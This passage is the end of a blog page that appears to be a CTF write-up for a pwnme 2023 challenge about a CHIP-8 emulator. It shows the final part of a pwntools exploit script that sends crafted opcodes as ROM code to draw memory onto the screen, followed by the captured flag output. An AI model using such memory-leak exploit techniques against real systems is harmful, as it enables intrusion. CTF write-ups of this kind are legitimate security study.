0xfff</span></span><br><span class="line">		<span class="number">0x6111</span> + <span class="number">0xf</span>*STEP, <span class="comment"># 6xkk - LD Vx, byte, R1 = 0x1F</span></span><br><span class="line">        <span class="number">0xF11E</span>, <span class="comment"># ADD I, R1, I =&gt; 0x101F</span></span><br><span class="line">		<span class="number">0xDBCF</span>  <span class="comment"># Write on screen (xored with current pixels) 15 bytes from I</span></span><br><span class="line">    ]</span><br><span class="line"></span><br><span class="line">    code_to_send = [pwn.p16(k) <span class="keyword">for</span> k <span class="keyword">in</span> code]</span><br><span class="line"></span><br><span class="line">    io.sendafter(<span class="string">b&quot;Enter ROM code: &quot;</span>, <span class="string">b&quot;&quot;</span>.join(code_to_send))</span><br><span class="line">    io.sendline(<span class="string">b&quot;\n&quot;</span>)</span><br><span class="line">    io.sendline(<span class="string">b&quot;\n&quot;</span>)</span><br><span class="line"></span><br><span class="line">    io.sendline(<span class="string">b&quot;\n&quot;</span>)</span><br><span class="line"></span><br><span class="line">    io.interactive()</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    exp()</span><br><span class="line"></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">PWNME&#123;CH1p-8_3mu14t0r_1s_h4Ck4bl3_1n_2023_y34h&#125;</span></span><br><span class="line"><span class="string">╔════════════════════════════════════════════════════════════════╗</span></span><br><span class="line"><span class="string">║ █ █ ▄▄▄                                                        ║PW</span></span><br><span class="line"><span class="string">║ █  ██▀▄                                                        ║NM</span></span><br><span class="line"><span class="string">║ █▄▄▄▀▄█                                                        ║E&#123;</span></span><br><span class="line"><span class="string">║ █  ▄ ▀▀                                                        ║CH</span></span><br><span class="line"><span class="string">║ ▄██   ▀                                                        ║18</span></span><br><span class="line"><span class="string">║  █▄█▀ ▀                                                        ║-8</span></span><br><span class="line"><span class="string">║ ▀▄█▀▀██                                                        ║_3</span></span><br><span class="line"><span class="string">║ ▀▀ ▀▀ ▀                                                         m</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">second part</span></span><br><span class="line"><span class="string">╔════════════════════════════════════════════════════════════════╗</span></span><br><span class="line"><span class="string">║ ██▄▀█ █                                                        ║mu</span></span><br><span class="line"><span class="string">║  ██ ▄ ▀                                                        ║14</span></span><br><span class="line"><span class="string">║ ▀██ ▀                                                          ║t0</span></span><br><span class="line"><span class="string">║ █▀█▄▄█▄                                                        ║r_</span></span><br><span class="line"><span class="string">║ ▄██  ▄█                                                        ║1s</span></span><br><span class="line"><span class="string">║ █▄▀█▀▀▀                                                        ║_h</span></span><br><span class="line"><span class="string">║ ▄▀▀ ▀▄▄                                                        ║4C</span></span><br><span class="line"><span class="string">║ ▀▀ ▀ ▀▀                                                        ║k</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">part three:</span></span><br><span class="line"><span class="string">════════════════════════════════════════════════════════════════╗</span></span><br><span class="line"><span class="string">║ ▄█▀ ▀▄                                                         ║4b</span></span><br><span class="line"><span class="string">║ ▀█▄▀▀▄▄                                                        ║l3</span></span><br><span class="line"><span class="string">║ ▀▄█▀▀▀█                                                        ║_1</span></span><br><span class="line"><span class="string">║ █▀▄███▄                                                        ║n_</span></span><br><span class="line"><span class="string">║  ██  ▀                                                         ║20</span></span><br><span class="line"><span class="string">║  ██  █▄                                                        ║23</span></span><br><span class="line"><span class="string">║ █▄██▀▀█                                                        ║_y</span></span><br><span class="line"><span class="string">║  ▀▀  ▀▀                                                         3</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">part four</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">║ ▄█▀▄▀                                                          ║4h</span></span><br><span class="line"><span class="string">║ ▀▀▀▀▀ ▀                                                        ║&#125;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br></pre></td></tr></table></figure>

        
      </div>

         
    </div>
    
     
  </div>
  
    
<nav id="article-nav">
  <a class="article-nav-btn left "
    
      href="/posts/cs2101/"
      title="[HackTM finals 2023 - pwn] cs2101"
     >
    <i class="fa-solid fa-angle-left"></i>
    <p class="title-text">
      
        [HackTM finals 2023 - pwn] cs2101
        
    </p>
  </a>
  <a class="article-nav-btn right "
    
      href="/posts/heaphop/"
      title="[pwnme 2023 - pwn] Heap-hop"
     >

    <p class="title-text">
      
        [pwnme 2023 - pwn] Heap-hop
        
    </p>
    <i class="fa-solid fa-angle-right"></i>
  </a>
</nav>


  
</article>

 
    </div>
    <div id="footer-wrapper">
      <footer id="footer">
  
  <div id="footer-info" class="inner">
    
    &copy; 2023 nasm<br>
    Powered by <a href="https://hexo.io/" target="_blank">Hexo</a> & Theme <a target="_blank" rel="noopener" href="https://github.com/saicaca/hexo-theme-vivia">Vivia</a>
  </div>
</footer>

    </div>
    <div class="back-to-top-wrapper">
    <button id="back-to-top-btn" class="back-to-top-btn" onclick="topFunction()">
        <span class="material-symbols-rounded">keyboard_arrow_up</span>
    </button>
</div>

<script>
    function topFunction() {
        window.scroll({ top: 0, behavior: 'smooth' });
    }
    let btn = document.getElementById('back-to-top-btn');
    function scrollFunction() {
        if (document.body.scrollTop > 600 || document.documentElement.scrollTop > 600) {
            btn.style.opacity = 1;
        } else {
            btn.style.opacity = 0;
        }
    }
    window.onscroll = function() {
        scrollFunction();
    }
</script>

  </div>
  <script src="/js/light-dark-switch.js"></script>
</body>
</html>
